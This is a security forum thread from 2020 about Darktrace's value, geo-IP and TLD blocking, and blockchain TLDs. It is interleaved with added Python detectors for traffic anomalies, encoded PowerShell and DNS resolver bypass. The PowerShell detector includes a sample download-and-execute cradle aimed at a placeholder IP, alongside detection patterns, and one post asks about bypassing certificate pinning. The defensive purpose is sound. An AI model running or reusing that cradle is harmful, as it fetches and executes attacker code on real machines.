Potato Salad posted:
like, what threat model does darktrace help address

the threat model of your employer not spending enough money on bullshit
# ? Oct 6, 2020 21:34 |
|
Potato Salad posted:
idk if darktrace helps improve awareness of ongoing modern c&c / exfiltration methods

geonetix posted:
the threat model of your employer not spending enough money on bullshit

Yeah, it's nonsense and I think I may have an opening to kill it off so I'd like to. It claims to watch network traffic and pick out things that look out of place. Anything from "this user logged into this computer, which we think is odd" to "a file that looks like it contains passwords was accessed off this server" to "this device seems to be communicating to a C&C server." I actually don't know if there's an industry term for what it does. Network Traffic Analysis? Network Detection and Response? My main problem with it is that it generates a ton of false alerts and honestly needs someone who spends time with it, but we're not big enough to have someone who just does infosec. It seems even less useful to us than normal with everyone working remotely. We also use Defender ATP, but I guess there is some value in something that monitors the underlying network and doesn't rely on the client/host.
|
# ? Oct 6, 2020 22:34 |
|
I trialed DT and it picked up some (noisy) red team exercise stuff so I dunno, it’s definitely doing something. We were in the middle of redoing our SIEM so I’m not sure if they would have picked it up or not but holy poo poo for the price they charge I kind of want the appliance to not just detect intrusion but dispatch a hired goon to the source geolocation.
some kinda jackal fucked around with this message at 23:55 on Oct 6, 2020 |
# ? Oct 6, 2020 23:52 |
|
Right, that's kinda where I'm at. I know we "got a good deal on it" but it's coming up for renewal and you know how that goes. Right now we need to spend more time on the fundamentals and I am really hoping that I can free up that budget for more down to earth solutions. It's not my money, but we don't have unlimited funds and I'd rather see them go somewhere else.
|
# ? Oct 7, 2020 00:27 |
|
Internet Explorer posted:
I actually don't know if there's an industry term for what it does. Network Traffic Analysis? Network Detection and Response? My main problem with it is that it generates a ton of false alerts and honestly needs someone who spends time with it, but we're not big enough to have someone who just doesn't infosec.

It’s just some kind of fancy baseline deviation algorithm probably. I don’t know for a fact but I would suspect it would be pretty effective inside a closed, static application environment. Like if you have an environment that runs a customer facing service, your baseline traffic and patterns probably deviate a LOT less than an office with human beings, and my GUESS is that it would be more on-point there with fewer false positives. Then again, in an environment with a limited subset of expected traffic you could probably piece together something to detect this kind of activity without their price tag. Not saying it’s not difficult, but I bet the insights you’d get into an environment and the tools you stand up would be much more valuable as a learning exercise.
|
# ? Oct 7, 2020 00:36 |
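The "baseline deviation" guess above, worked through as an added example (this is not Darktrace's algorithm or anyone's posted code; host names, byte counts and the threshold are constructed for illustration). It keeps a per-host mean and standard deviation of outbound bytes and alerts on anything more than k standard deviations above it, which is enough to show why the same sized transfer is an obvious alert on a static service box and invisible on a workstation with a noisy baseline.

```python
"""Added example: a toy per-host baseline-deviation detector.

Not Darktrace's algorithm or code; a constructed illustration of the point
that a static service environment gives a tight baseline while an office of
humans gives a wide one that swallows real anomalies. All data is made up.
"""
import statistics
from collections import defaultdict

# Constructed training samples: (host, outbound bytes per interval).
# web-01 is a static customer-facing box; ws-17 is a human's workstation.
SAMPLES = [
    ("web-01", 1000), ("web-01", 1010), ("web-01", 990), ("web-01", 1005), ("web-01", 995),
    ("ws-17", 200), ("ws-17", 5000), ("ws-17", 40), ("ws-17", 12000), ("ws-17", 800),
]

# Constructed new observations to score: both are unusually large transfers,
# and the workstation's is ten times bigger than the server's.
OBSERVATIONS = [("web-01", 1500), ("ws-17", 15000)]


def build_baselines(samples):
    """Return {host: (mean, population stdev)} over the training samples."""
    per_host = defaultdict(list)
    for host, nbytes in samples:
        per_host[host].append(nbytes)
    return {h: (statistics.fmean(v), statistics.pstdev(v)) for h, v in per_host.items()}


def score(baselines, host, nbytes, floor=1.0):
    """z-score of one observation against its host's baseline.

    `floor` stops a perfectly flat baseline from dividing by zero; a host
    with no baseline gets None rather than a guessed score.
    """
    if host not in baselines:
        return None
    mean, sd = baselines[host]
    return (nbytes - mean) / max(sd, floor)


def detect(baselines, observations, k=3.0):
    """Return (host, bytes, z) for observations more than k stdevs above baseline."""
    alerts = []
    for host, nbytes in observations:
        z = score(baselines, host, nbytes)
        if z is not None and z > k:
            alerts.append((host, nbytes, round(z, 2)))
    return alerts


if __name__ == "__main__":
    bl = build_baselines(SAMPLES)
    for host, nbytes in OBSERVATIONS:
        print(host, nbytes, "z=%.2f" % score(bl, host, nbytes))
    print("alerts:", detect(bl, OBSERVATIONS))
```

With these numbers the 1500-byte transfer from web-01 scores around z=70 and fires, while the 15000-byte transfer from ws-17 scores under 3 and does not, because the workstation's own history already contains a 12000-byte interval. Tuning k down to catch the workstation case is exactly what produces the flood of false positives the thread is complaining about.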
|
Isn't DT literally just bayesian filtering for your traffic/logs?
|
# ? Oct 7, 2020 09:45 |
|
DT is not good technology. I’ve seen it used across multiple different environments and the ML models are pure noise. The times that I’ve seen it catch things, it was due to the classic network signatures it has (that any network ids would have). Network sensors in general in this day and age are kind of a waste of money. Unless you have your network setup so it can man in the middle SSL traffic, a network sensor is a literal waste because it can’t inspect the encrypted SSL traffic and more and more malware is using SSL for C2 comms. Spend your money instead on a good cross platform EDR.
|
# ? Oct 7, 2020 14:01 |
|
there are some NDR tools these days that do substantially more than dark trace ever did. I'm still not sold on the concept of NDR, and I think it's just old engineers trying to sell old products to old it managers who work in old companies that are finally looking at trying to take security seriously for the first time in a century

edit: not to mention that DT doesn't even R

Potato Salad fucked around with this message at 14:28 on Oct 7, 2020 |
# ? Oct 7, 2020 14:19 |
|
heck, Azure Sentinel could be thought of as an upgrade to darktrace, and it's not even trying to compete in that old-timey "these log levels are novel" alert system sector
|
# ? Oct 7, 2020 14:22 |
|
The magical combination of EDR + zscaler + device trust on authentication is fantastic for solving most problems tbh
|
# ? Oct 7, 2020 14:30 |
|
RFC2324 posted:
does anyone think remote desktoping in is cool without explicit approval, because it seems like a no brainer that getting caught at it will get you a talking to nowadays

Also a lot of methods aggressively advertise themselves and just make it super easy. Chrome Remote Desktop, for example.
|
# ? Oct 7, 2020 17:23 |
|
What's the consensus on blocking based on Geo-IP and things like TLD? My manager blocked everything that wasn't US-based traffic at one point. I've been slowly adding countries back to the list, since because of cloud-based services we were seeing all kinds of denials for legitimate traffic. What's being pushed for now is blocking all of the 'new' TLDs. Basically anything that isn't a com/net/org/edu/mil. This is just a headache. Security theatre thanks to some dumb mailing lists he is on. In my mind, those are kind of silly things to rely upon. Sure, you get some protection from random Chinese/Russian botnets, and we don't have any customers that aren't in the USA, but it's not scalable and hard to manage.

Bob Morales fucked around with this message at 18:19 on Oct 7, 2020 |
# ? Oct 7, 2020 18:17 |
|
Also, is https://security.stackexchange.com/ worth adding to the OP?
|
# ? Oct 7, 2020 18:18 |
|
Blocking TLDs is dumb. We block Russia and China, but I don’t think it actually accomplishes anything except maybe reducing the noise a little. There is still plenty of malicious traffic coming from places you can’t block.
|
# ? Oct 7, 2020 18:21 |
|
The Fool posted:
Blocking tld’s is dumb

Most of the poo poo like a driveby on some website or CNC poo poo for a downloaded/phished bot is just as likely to be based in a compromised system that passes the whitelist anyway so...
|
# ? Oct 7, 2020 18:25 |
|
Bob Morales posted:
What's the consensus on blocking based on Geo-IP and things like TLD?

The result is log reduction and absolutely nothing more. There is a huge amount of small ISPs (usually rural or WISP startups) that are leasing dirty IP space from CN/RU/whatever. Consider also dropping all of SC/ZA while you're at it. There are multiple /8s in aggregate that were stolen and hijacked and are being used daily for abuse. Also, you can just buy a US proxy for a cent a day, so really it's just log reduction.
|
# ? Oct 7, 2020 18:39 |
|
Okay, so I'm not off-base when I recommend not doing these. I'll probably be forced to anyway. The .bazar domain has been linked to the Bazar malware so OMG. Here's the email that was forwarded to me, from a mailing list:

Some dildo that probably makes double what I make posted:
MAILING LIST,

Some other dildo posted:
YMMV, but this is the list that we’ve been blocking for a while now.
|
# ? Oct 7, 2020 18:52 |
|
.men but not .women? Wait till the MRA people hear this one
|
# ? Oct 7, 2020 18:56 |
|
lol at that list
|
# ? Oct 7, 2020 19:00 |
|
They block .nu? Like half of Swedish web pages are .nu, because it means now in Swedish. Famous scammer country.
|
# ? Oct 7, 2020 19:02 |
|
I'm the trailing / showing a block of websites, not actually blocking ips
|
# ? Oct 7, 2020 19:05 |
|
My personal domain and email address is on xyz lol
|
# ? Oct 7, 2020 19:07 |
|
quote:
If you have technology that can block encoded powershell commands, powershell from downloading scripts or files from the internet, etc..* it can stop the early phases of Trickbot/Emotet and other malware.
|
# ? Oct 7, 2020 19:16 |
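The control the quoted mailing list is describing, as an added example (not from that list, the thread, or any product): decode the base64/UTF-16LE blob behind `-EncodedCommand` (or any of the abbreviations powershell.exe accepts, `-e`, `-ec`, `-enc`) and look inside it for download-cradle and hidden-window indicators. The sample command lines and the indicator names are constructed for this example; 198.51.100.7 is a documentation (TEST-NET-2) address.

```python
"""Added example: detector for encoded PowerShell download cradles.

Not from the quoted mailing list or any product; a constructed illustration
of the control the quote describes. Sample command lines are made up.
"""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
ENCODED_FLAG = "encodedcommand"

# Indicators searched in the outer command line plus the decoded script.
# The category names are hypothetical, chosen for this example.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(rofile)?\b", re.I),
}


def encode_command(script: str) -> str:
    """The base64(UTF-16LE) form powershell.exe expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an encoded-command blob, else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if tok[0] in "-/" and flag and ENCODED_FLAG.startswith(flag):
            blob = tokens[i + 1].strip("'\"")
            try:
                raw = base64.b64decode(blob, validate=True)
            except (binascii.Error, ValueError):
                return None  # flag present but payload is not valid base64
            return raw.decode("utf-16-le", errors="replace")
    return None


def analyze(cmdline: str) -> dict:
    """Classify one process command line: encoded?, decoded script, indicators, block?"""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + ("\n" + decoded if decoded else "")
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(haystack))
    # Block rule for this example: encoded launch that fetches from the network.
    block = decoded is not None and ("download_cradle" in hits or "url" in hits)
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": hits, "block": block}


# Constructed sample command lines: one cradle, one benign script, one benign encoded.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SAMPLE_LINES = [
    "powershell.exe -nop -w hidden -enc " + encode_command(CRADLE),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -EncodedCommand " + encode_command("Get-Date"),
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        r = analyze(line)
        print(r["block"], r["indicators"], (r["decoded"] or "")[:60])
```

The second sample is the kind of thing a "block all PowerShell" rule breaks and the third shows that encoding by itself is not malicious (installers and management tooling use it), which is why the decision keys on what the decoded script does rather than on the flag alone. Real telemetry for this is the process creation event with the full command line (Sysmon event 1 or Windows 4688 with command-line auditing on); script block logging (event 4104) would give you the decoded content directly.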
|
I have a .co domain so every exchange of my email address has to include the discussion 'not dot UK?'
|
# ? Oct 7, 2020 19:27 |
|
Bob Morales posted:
The .bazar domain has been linked to the Bazar malware so OMG

This is a blockchain TLD, it isn't even publicly resolvable on the internet
|
# ? Oct 7, 2020 19:29 |
|
Biowarfare posted:
blockchain TLD

boy, I didn't need to know that that was even a thing, at all
|
# ? Oct 7, 2020 19:33 |
|
Subjunctive posted:
boy, I didn't need to know that that was even a thing, at all

this is the new https://en.wikipedia.org/wiki/New.net (you might as well block .onion while youre at it)
|
# ? Oct 7, 2020 19:33 |
|
Biowarfare posted:
this is the new https://en.wikipedia.org/wiki/New.net

that's definitely something that didn't need a remake
|
# ? Oct 7, 2020 19:35 |
|
Biowarfare posted:
This is a blockchain TLD, it isn't even publicly resolvable on the internet

https://emercoin.com/en/documentation/blockchain-services/emerdns/emerdns-introduction
|
# ? Oct 7, 2020 19:43 |
|
yeah, if you're curious there's a handful of alternative dns roots of sorts. the biggest network of separate resolvers is opennic: https://en.wikipedia.org/wiki/OpenNIC#Peering_agreements

IIRC, other than for .onion, most malware doesn't bother running its own software (like actual blockchain clients); most of it just tries to resolve against a random public resolver instead of the local system resolver

Impotence fucked around with this message at 19:46 on Oct 7, 2020 |
# ? Oct 7, 2020 19:43 |
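That last observation is the detection to build rather than a TLD blocklist: a client that sends port-53 traffic anywhere except the sanctioned internal resolvers is worth a look regardless of what name it asked for. Below is an added example of that check over constructed firewall-style log lines (not the thread's or any product's logic; the resolver addresses, hosts and destinations are made up, using private and documentation ranges).

```python
"""Added example: flag DNS that bypasses the sanctioned resolver.

A constructed illustration of the observation that malware often resolves
against a random public resolver instead of the system one. The log lines,
hosts and resolver addresses are made up; not any product's logic.
"""
import ipaddress
from collections import Counter, defaultdict

# Assumed environment: two internal resolvers, one internal /8.
SANCTIONED_RESOLVERS = {ipaddress.ip_address("10.0.0.53"), ipaddress.ip_address("10.0.1.53")}
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed log: "ts src dst dport proto". 10.0.5.21 behaves; 10.0.5.88 talks
# DNS to two outside hosts; the last two lines are the resolver's own upstream
# query and ordinary HTTPS, neither of which should fire.
LOG = """\
1601990000 10.0.5.21 10.0.0.53 53 udp
1601990001 10.0.5.21 10.0.0.53 53 udp
1601990002 10.0.5.88 203.0.113.9 53 udp
1601990003 10.0.5.88 203.0.113.9 53 tcp
1601990004 10.0.5.88 198.51.100.44 53 udp
1601990005 10.0.0.53 198.51.100.2 53 udp
1601990006 10.0.5.21 203.0.113.80 443 tcp
"""


def parse(log_text):
    """Parse the constructed log format into (ts, src, dst, dport, proto) tuples."""
    rows = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport, proto = line.split()
        rows.append((int(ts), ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport), proto))
    return rows


def resolver_bypass(rows):
    """Count port-53 flows from internal clients to anything but the sanctioned resolvers.

    The resolvers' own upstream queries are expected and excluded, as is
    traffic from outside the internal ranges. Returns Counter{(src, dst): n}.
    """
    hits = Counter()
    for _ts, src, dst, dport, _proto in rows:
        if dport != 53 or dst in SANCTIONED_RESOLVERS:
            continue
        if src in SANCTIONED_RESOLVERS or not any(src in net for net in INTERNAL_NETS):
            continue
        hits[(str(src), str(dst))] += 1
    return hits


def by_client(hits):
    """Group the flagged flows per client: {src: sorted list of foreign resolvers}."""
    clients = defaultdict(set)
    for (src, dst), _n in hits.items():
        clients[src].add(dst)
    return {src: sorted(dsts) for src, dsts in clients.items()}


if __name__ == "__main__":
    hits = resolver_bypass(parse(LOG))
    for (src, dst), n in sorted(hits.items()):
        print(f"{src} -> {dst}:53  x{n}")
    print(by_client(hits))
```

The caveat is the same one raised earlier in the thread about encrypted traffic: this only sees plain DNS on port 53. A client using DNS over HTTPS to a public resolver looks like any other 443 flow, so on a network where that is allowed the equivalent check has to live on the endpoint or the proxy. A name in an alternative root like .bazar is only useful to the malware if the query reaches a resolver that serves that root, which is why the destination of the DNS traffic, not the TLD, is the thing to log.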
|
It's unreasonable to do geo-ip blocking but you should definitely consume as many good threat intel feeds as you can, and pull them into automatic blacklists.
|
# ? Oct 8, 2020 11:41 |
|
I haven't done this in a while, what's the easiest way to break cert pinning on a Win32 application? file magic says PE32 executable (GUI) Intel 80386, for MS Windows; as far as I know it ships with embedded OpenSSL and a bunch of CA certificates embedded into the exe.

edit: I'm going to try hex editing a DER into one of the replacements and see what happens, lol

Impotence fucked around with this message at 13:20 on Oct 9, 2020 |
# ? Oct 9, 2020 13:17 |
|
It's very likely you're legally compelled to block traffic from embargoed countries. Geoip blocking is useless for actually preventing attacks from those countries, but does fulfill your legal obligation* *In my experience, that is. I am not a lawyer, this is not legal advice
|
# ? Oct 9, 2020 15:29 |
|
Achmed Jones posted:
It's very likely you're legally compelled to block traffic from embargoed countries. Geoip blocking is useless for actually preventing attacks from those countries, but does fulfill your legal obligation*

that just sounds dumb on its face

random ip traffic is not the same as doing business with
|
# ? Oct 9, 2020 15:37 |
|
The Fool posted:
that just sounds dumb on its face

Usually, for legal purposes, you just need to be able to point at a thing and say "see? An attempt was made!" And your liability is covered
|
# ? Oct 9, 2020 15:41 |
|
What, stupid legal interpretations of tech poo poo? Well I never Context also matters. Infosec person at a large legal firm vs a saas shop vs an ad network vs netflix
|
# ? Oct 9, 2020 15:41 |
|
RFC2324 posted:
Usually, for legal purposes, you just need to be able to point at a thing and say "see? An attempt was made!" And your liability is covered

This is exactly how it was explained to me at oldjob lol
|
# ? Oct 9, 2020 15:42 |
|
The Fool posted:
that just sounds dumb on its face

Good luck explaining the difference to an 80 year old judge with syphilis and covid
|
# ? Oct 9, 2020 15:43 |
|
If you need to follow ITAR or something, it's absolutely something that you'll need to do. Pretty much for the reasons stated above.
|
# ? Oct 9, 2020 15:45 |
|
|
xtal posted:
Good luck explaining the difference to an 80 year old judge with syphilis and covid

Are we talking about the Google/Oracle API Copyright case now
|
# ? Oct 9, 2020 15:48 |